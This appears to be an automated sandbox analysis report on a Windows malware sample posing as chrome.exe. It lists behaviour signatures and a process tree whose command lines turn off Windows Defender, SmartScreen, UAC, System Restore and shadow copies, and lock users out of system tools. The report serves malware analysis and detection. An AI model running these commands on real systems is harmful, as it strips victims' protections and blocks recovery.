Resubmissions
02/04/2025, 19:18
250402-x1fajsvmt9 1022/03/2025, 04:45
250322-fdd1jaxzax 1022/03/2025, 04:32
250322-e5x22sxydw 1022/03/2025, 01:50
250322-b9qa8ayrs5 10Analysis
-
max time kernel
177s -
max time network
280s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
-
submitted
02/04/2025, 19:18
General
-
Target
chrome.exe
-
Size
4.1MB
-
MD5
d162022a4f77fe568e3644c8ddccfc91
-
SHA1
940b43d35e0bd31d108b5758339494e1b990ac21
-
SHA256
780044208370ddc653095749d6e17ba029364d169891c8fcf2ff10974e0800ab
-
SHA512
81db20a0cf1ba119769a86b1c24a1106a2a13c0dd4c42285128cd506c385e596466f5bafae196ec22187fbd729eb5167295b6d9850d04d92c1c67540bba8573e
-
SSDEEP
98304:bhmbefkYYSmghDECMUVXhxEt3/PGrcFEXdA+Sif2g07:bf8YbmGlhVmv+r1XyNi+g07
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs
-
Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
-
Modifies Windows Defender notification settings 3 TTPs 6 IoCs
-
Modifies security service 2 TTPs 1 IoCs
-
UAC bypass 3 TTPs 3 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
-
Disables RegEdit via registry modification 1 IoCs
-
Disables Task Manager via registry modification
-
Disables cmd.exe use via registry modification 1 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
-
Modifies Windows Firewall 2 TTPs 7 IoCs
-
Possible privilege escalation attempt 8 IoCs
-
Sets file to hidden 1 TTPs 6 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Enumerates connected drives 3 TTPs 49 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Modifies Security services 2 TTPs 5 IoCs
Modifies the startup behavior of a security service.
-
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 64 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 64 IoCs
-
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 5 IoCs
-
Modifies data under HKEY_USERS 1 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 4 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
-
Suspicious behavior: SetClipboardViewer 14 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 54 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 44 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 6 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\52B4.tmp\52B5.tmp\52B6.bat C:\Users\Admin\AppData\Local\Temp\chrome.exe"2⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v sex.exe /d "C:\Windows\System32\sex.exe"3⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /t REG_DWORD /f /d 13⤵
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\System\CurrentControlSet\Control\SafeBoot /v AlternateShell /t REG_SZ /d "C:\Windows\System32\sex.exe" /f3⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName /v "ComputerName" /t REG_SZ /d "NeoandRedV" /f3⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "s1159" /t REG_SZ /d "Neo" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "s2359" /t REG_SZ /d "Red_V" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "sCountry" /t REG_SZ /d "United Red_V of Neo" /f3⤵
-
-
C:\Windows\system32\timeout.exetimeout 3 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\control.execontrol3⤵
-
-
C:\Windows\system32\cttune.execttune3⤵
-
-
C:\Windows\system32\DisplaySwitch.exedisplayswitch.exe3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v BatteryFlyout /t REG_DWORD /f /d 03⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v HelpCustomized /t REG_DWORD /f /d 13⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Manufacturer /t REG_SZ /f /d "Neo, Red_V"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Model /t REG_SZ /f /d "YOU HAVE BEEN FUCKED"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportHours /t REG_SZ /f /d "NEO"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportPhone /t REG_SZ /f /d "NEO"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportURL /t REG_SZ /f /d "http://www.neocorporations.com"3⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\MTCUVC" /v EnableMtcUvc /t REG_DWORD /f /d 03⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\devmgmt.msc"3⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo2.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo3.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo4.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo5.vbs"3⤵
-
-
C:\Windows\system32\dxdiag.exedxdiag3⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\diskmgmt.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\SndVol.exeSndVol.exe3⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\player.vbs"3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f3⤵
- Modifies Windows Defender TamperProtection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
-
-
C:\Windows\system32\sc.exesc config webthreatdefsvc start= disabled3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc config webthreatdefusersvc start= disabledreg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f3⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f3⤵
-
-
C:\Windows\system32\takeown.exetakeown /s LNGJKLSN /u Admin /f "C:\Windows\System32\smartscreen.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\smartscreen.exe" /grant:r Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /im smartscreen.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\control.execontrol display3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL display4⤵
-
-
-
C:\Windows\system32\control.execontrol3⤵
-
-
C:\Windows\system32\control.execontrol system3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\Fondue.exefondue3⤵
-
-
C:\Windows\system32\msconfig.exemsconfig3⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\msinfo32.exemsinfo323⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\OptionalFeatures.exeoptionalfeatures3⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\slui.exeslui.exe3⤵
-
C:\Windows\system32\slui.exe"C:\Windows\system32\slui.exe" 0x034⤵
-
C:\Windows\system32\ChangePk.exe"C:\Windows\system32\ChangePk.exe"5⤵
-
-
-
-
C:\Windows\system32\SystemPropertiesAdvanced.exeSystemPropertiesAdvanced3⤵
-
-
C:\Windows\system32\SystemPropertiesComputerName.exeSystemPropertiesComputerName3⤵
-
-
C:\Windows\system32\SystemPropertiesDataExecutionPrevention.exeSystemPropertiesDataExecutionPrevention3⤵
-
-
C:\Windows\system32\SystemPropertiesHardware.exeSystemPropertiesHardware3⤵
-
-
C:\Windows\system32\SystemPropertiesPerformance.exeSystemPropertiesPerformance3⤵
-
-
C:\Windows\system32\SystemPropertiesProtection.exeSystemPropertiesProtection3⤵
-
-
C:\Windows\system32\SystemPropertiesRemote.exeSystemPropertiesRemote3⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\WF.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\lusrmgr.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\winver.exewinver3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\desk.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\desk.cpl",4⤵
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" ms-settings:display5⤵
-
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\ncpa.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\ncpa.cpl",4⤵
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\mmsys.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\mmsys.cpl",4⤵
-
-
-
C:\Windows\system32\RecoveryDrive.exeRecoveryDrive.exe3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 2 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideIcons /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPinningToTaskbar /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayItemsDisplay /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSaveSettings /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileAssociate /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSecurityTab /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSecurityTab /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Command Processor" /v DisableUNCCheck /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoClose /t REG_DWORD /f /d 13⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticetext /f /d "ATTENTION!"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticecaption /f /d "YOU HAVE BEEN SCREWED!"3⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\sc.exesc config VSS start= disabled"3⤵
- Launches sc.exe
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\sysdm.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\sysdm.cpl",4⤵
-
-
-
C:\Windows\explorer.exeexplorer.exe3⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\timedate.cpl",3⤵
-
